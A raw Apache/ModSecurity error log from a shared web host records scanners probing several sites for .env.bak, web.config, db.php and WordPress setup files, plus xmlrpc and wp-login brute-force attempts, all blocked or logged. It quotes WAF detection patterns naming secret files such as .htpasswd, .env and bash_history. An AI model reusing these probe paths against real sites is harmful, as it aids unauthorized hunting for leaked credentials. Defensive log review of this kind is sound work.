[Tue May 26 17:30:55.019612 2026] [security2:error] [pid 894579:tid 894751] [client 91.92.42.86:30200] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/db.php"] [unique_id "ahWLdwEtZWuWWBGzl__IWQAAATM"], referer: http://anujtradingco.com/
[Tue May 26 17:30:55.024661 2026] [security2:error] [pid 891273:tid 891509] [client 91.92.42.86:30142] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLdsDEzZ8z3jtDm82hkwAAAGo"], referer: http://anujtradingco.com/
[Tue May 26 17:30:55.026576 2026] [security2:error] [pid 894579:tid 894801] [client 91.92.42.86:30234] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "test.anujtradingco.com"] [uri "/.env.bak"] [unique_id "ahWLdwEtZWuWWBGzl__IWgAAAWQ"], referer: http://test.anujtradingco.com/
[Tue May 26 17:30:55.029669 2026] [core:error] [pid 894579:tid 894748] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:30:55.029690 2026] [core:error] [pid 894579:tid 894748] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:30:55.034145 2026] [security2:error] [pid 891273:tid 891460] [client 91.92.42.86:30244] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "new.anujtradingco.com"] [uri "/.env.bak"] [unique_id "ahWLd8DEzZ8z3jtDm82hmwAAADk"], referer: http://new.anujtradingco.com/
[Tue May 26 17:30:55.036278 2026] [security2:error] [pid 891273:tid 891454] [client 91.92.42.86:30246] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "new.anujtradingco.com"] [uri "/db.php"] [unique_id "ahWLd8DEzZ8z3jtDm82hnAAAADM"], referer: http://new.anujtradingco.com/
[Tue May 26 17:30:55.054859 2026] [security2:error] [pid 894579:tid 894819] [client 91.92.42.86:30290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/database.php"] [unique_id "ahWLdwEtZWuWWBGzl__IXAAAAXY"], referer: http://test.anujtradingco.com/
[Tue May 26 17:30:55.059966 2026] [security2:error] [pid 891273:tid 891438] [client 91.92.42.86:30288] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "test.anujtradingco.com"] [uri "/web.config"] [unique_id "ahWLd8DEzZ8z3jtDm82hnwAAACM"], referer: http://test.anujtradingco.com/
[Tue May 26 17:30:55.073741 2026] [security2:error] [pid 894579:tid 894743] [client 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLdwEtZWuWWBGzl__IWAAAASs"], referer: http://anujtradingco.com/
[Tue May 26 17:30:55.150274 2026] [security2:error] [pid 894579:tid 894799] [client 91.92.42.86:30362] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greenfood.anujtradingco.com"] [uri "/settings.php"] [unique_id "ahWLdwEtZWuWWBGzl__IYAAAAWI"], referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:30:55.168050 2026] [security2:error] [pid 894579:tid 894781] [client 91.92.42.86:30380] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "new.anujtradingco.com"] [uri "/web.config"] [unique_id "ahWLdwEtZWuWWBGzl__IYQAAAVA"], referer: http://new.anujtradingco.com/
[Tue May 26 17:30:55.197715 2026] [security2:error] [pid 891273:tid 891515] [client 91.92.42.86:30276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/db.php"] [unique_id "ahWLd8DEzZ8z3jtDm82howAAAHA"], referer: http://test.anujtradingco.com/
[Tue May 26 17:30:55.261826 2026] [security2:error] [pid 894579:tid 894747] [client 91.92.42.86:30410] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/settings.php"] [unique_id "ahWLdwEtZWuWWBGzl__IZAAAAS8"], referer: http://test.anujtradingco.com/
[Tue May 26 17:30:55.321719 2026] [security2:error] [pid 894579:tid 894772] [client 91.92.42.86:30380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "new.anujtradingco.com"] [uri "/settings.php"] [unique_id "ahWLdwEtZWuWWBGzl__IZgAAAUc"], referer: http://new.anujtradingco.com/
[Tue May 26 17:30:55.470078 2026] [core:error] [pid 891273:tid 891479] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:30:55.470102 2026] [core:error] [pid 891273:tid 891479] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:30:55.684061 2026] [security2:error] [pid 891273:tid 891416] [client 91.92.42.86:30244] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "new.anujtradingco.com"] [uri "/database.php"] [unique_id "ahWLd8DEzZ8z3jtDm82hrgAAAA0"], referer: http://new.anujtradingco.com/
[Tue May 26 17:30:55.784814 2026] [security2:error] [pid 894579:tid 894837] [client 91.92.42.86:30020] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/settings.php"] [unique_id "ahWLdwEtZWuWWBGzl__IbgAAAYg"], referer: http://anujtradingco.com/
[Tue May 26 17:30:55.957234 2026] [core:error] [pid 894579:tid 894730] [client 91.92.42.86:30128] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:30:55.957258 2026] [core:error] [pid 894579:tid 894730] [client 91.92.42.86:30128] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:30:55.969837 2026] [security2:error] [pid 891273:tid 891409] [client 91.92.42.86:30100] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLd8DEzZ8z3jtDm82hswAAAAY"], referer: http://anujtradingco.com/
[Tue May 26 17:30:56.022968 2026] [core:error] [pid 894579:tid 894825] [client 91.92.42.86:30152] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:30:56.022999 2026] [core:error] [pid 894579:tid 894825] [client 91.92.42.86:30152] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:30:56.040587 2026] [core:error] [pid 891273:tid 891431] [client 91.92.42.86:30184] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:30:56.040608 2026] [core:error] [pid 891273:tid 891431] [client 91.92.42.86:30184] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:30:56.043598 2026] [core:error] [pid 894579:tid 894796] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:30:56.043612 2026] [core:error] [pid 894579:tid 894796] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:30:56.073340 2026] [security2:error] [pid 894579:tid 894738] [client 91.92.42.86:30260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greenfood.anujtradingco.com"] [uri "/database.php"] [unique_id "ahWLeAEtZWuWWBGzl__IcwAAASY"], referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:30:56.082931 2026] [core:error] [pid 894579:tid 894798] [client 91.92.42.86:30240] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:30:56.082950 2026] [core:error] [pid 894579:tid 894798] [client 91.92.42.86:30240] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:30:56.137553 2026] [security2:error] [pid 894579:tid 894737] [client 91.92.42.86:30322] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "greenfood.anujtradingco.com"] [uri "/.env.bak"] [unique_id "ahWLeAEtZWuWWBGzl__IdQAAASU"], referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:30:56.153459 2026] [core:error] [pid 891273:tid 891463] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:30:56.153477 2026] [core:error] [pid 891273:tid 891463] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:30:56.168801 2026] [core:error] [pid 891273:tid 891484] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:30:56.168816 2026] [core:error] [pid 891273:tid 891484] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:30:56.421428 2026] [security2:error] [pid 894579:tid 894603] [remote 74.7.241.58:35622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWLeAEtZWuWWBGzl__IhAABhBc"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/afstpaul.org/wp-content/plugins/woocommerce/templates/order
[Tue May 26 17:30:56.839201 2026] [security2:error] [pid 894579:tid 894746] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLeAEtZWuWWBGzl__IgQAAAS4"]
[Tue May 26 17:30:59.074735 2026] [security2:error] [pid 891273:tid 891422] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLesDEzZ8z3jtDm82h4wAAABM"]
[Tue May 26 17:31:00.110102 2026] [security2:error] [pid 891273:tid 891405] [client 223.235.98.214:3002] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLfMDEzZ8z3jtDm82h7AAAAAI"]
[Tue May 26 17:31:00.110270 2026] [security2:error] [pid 891273:tid 891405] [client 223.235.98.214:3002] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLfMDEzZ8z3jtDm82h7AAAAAI"]
[Tue May 26 17:31:01.508303 2026] [security2:error] [pid 894579:tid 894720] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLfQEtZWuWWBGzl__IvwAAARQ"]
[Tue May 26 17:31:04.820216 2026] [security2:error] [pid 891273:tid 891510] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLgMDEzZ8z3jtDm82iFgAAAGs"]
[Tue May 26 17:31:06.718630 2026] [security2:error] [pid 894579:tid 894812] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLggEtZWuWWBGzl__JJQAAAW8"]
[Tue May 26 17:31:08.533553 2026] [security2:error] [pid 894579:tid 894823] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLhAEtZWuWWBGzl__JUwAAAXo"]
[Tue May 26 17:31:10.814812 2026] [security2:error] [pid 894579:tid 894745] [client 223.235.98.214:31277] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLhgEtZWuWWBGzl__JkAAAAS0"]
[Tue May 26 17:31:10.814939 2026] [security2:error] [pid 894579:tid 894745] [client 223.235.98.214:31277] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLhgEtZWuWWBGzl__JkAAAAS0"]
[Tue May 26 17:31:10.847820 2026] [security2:error] [pid 894579:tid 894770] [client 104.28.102.77:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWLhgEtZWuWWBGzl__JjwAAAUU"]
[Tue May 26 17:31:11.297797 2026] [security2:error] [pid 894579:tid 894778] [client 181.15.101.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLhgEtZWuWWBGzl__JmgAAAU0"]
[Tue May 26 17:31:11.329653 2026] [security2:error] [pid 894579:tid 894819] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLhgEtZWuWWBGzl__JnQAAAXY"]
[Tue May 26 17:31:11.769351 2026] [security2:error] [pid 894579:tid 894617] [remote 49.12.3.147:53284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahWLhwEtZWuWWBGzl__JsAABJCU"]
[Tue May 26 17:31:12.316886 2026] [security2:error] [pid 891273:tid 891431] [client 66.249.64.64:40348] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahWLhcDEzZ8z3jtDm82isQAAABw"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/0dabb6419938aac7-0dabb6419938aac7-combined.css
[Tue May 26 17:31:12.331051 2026] [security2:error] [pid 894579:tid 894825] [client 66.249.64.65:60667] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahWLhAEtZWuWWBGzl__JXwAAAXw"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/0dabb6419938aac7-0dabb6419938aac7-combined.css
[Tue May 26 17:31:13.725574 2026] [security2:error] [pid 894579:tid 894832] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLiQEtZWuWWBGzl__KCwAAAYM"]
[Tue May 26 17:31:14.544978 2026] [security2:error] [pid 894579:tid 894750] [client 62.244.225.226:29280] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWLigEtZWuWWBGzl__KMAAAATI"]
[Tue May 26 17:31:16.078526 2026] [security2:error] [pid 891273:tid 891494] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLi8DEzZ8z3jtDm82jWwAAAFs"]
[Tue May 26 17:31:17.162341 2026] [security2:error] [pid 894579:tid 894744] [client 54.205.63.235:58588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rizpashop.com"] [uri "/wp-admin/setup-config.php"] [unique_id "ahWLjQEtZWuWWBGzl__KnwAAASw"]
[Tue May 26 17:31:17.226290 2026] [security2:error] [pid 891273:tid 891499] [client 54.205.63.235:61573] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rizpashop.com"] [uri "/wordpress/wp-admin/setup-config.php"] [unique_id "ahWLjcDEzZ8z3jtDm82jgAAAAGA"]
[Tue May 26 17:31:17.226908 2026] [security2:error] [pid 894579:tid 894831] [client 54.205.63.235:61574] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rizpashop.com"] [uri "/old/wp-admin/setup-config.php"] [unique_id "ahWLjQEtZWuWWBGzl__KowAAAYI"]
[Tue May 26 17:31:17.227289 2026] [security2:error] [pid 894579:tid 894797] [client 54.205.63.235:61575] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rizpashop.com"] [uri "/wp/wp-admin/setup-config.php"] [unique_id "ahWLjQEtZWuWWBGzl__KpAAAAWA"]
[Tue May 26 17:31:17.227983 2026] [security2:error] [pid 894579:tid 894783] [client 54.205.63.235:61576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rizpashop.com"] [uri "/wordpress1/wp-admin/setup-config.php"] [unique_id "ahWLjQEtZWuWWBGzl__KpQAAAVI"]
[Tue May 26 17:31:17.228198 2026] [security2:error] [pid 894579:tid 894730] [client 54.205.63.235:61577] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rizpashop.com"] [uri "/staging/wp-admin/setup-config.php"] [unique_id "ahWLjQEtZWuWWBGzl__KpgAAAR4"]
[Tue May 26 17:31:17.228221 2026] [security2:error] [pid 894579:tid 894797] [client 54.205.63.235:61579] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rizpashop.com"] [uri "/wp-admin/install.php"] [unique_id "ahWLjQEtZWuWWBGzl__KpwAAAWA"]
[Tue May 26 17:31:17.228587 2026] [security2:error] [pid 891273:tid 891428] [client 54.205.63.235:61578] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rizpashop.com"] [uri "/backup/wp-admin/setup-config.php"] [unique_id "ahWLjcDEzZ8z3jtDm82jgQAAABk"]
[Tue May 26 17:31:17.228648 2026] [security2:error] [pid 891273:tid 891497] [client 54.205.63.235:61580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rizpashop.com"] [uri "/wordpress/wp-admin/install.php"] [unique_id "ahWLjcDEzZ8z3jtDm82jggAAAF4"]
[Tue May 26 17:31:17.228716 2026] [security2:error] [pid 894579:tid 894783] [client 54.205.63.235:61582] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rizpashop.com"] [uri "/staging/wp-admin/install.php"] [unique_id "ahWLjQEtZWuWWBGzl__KqQAAAVI"]
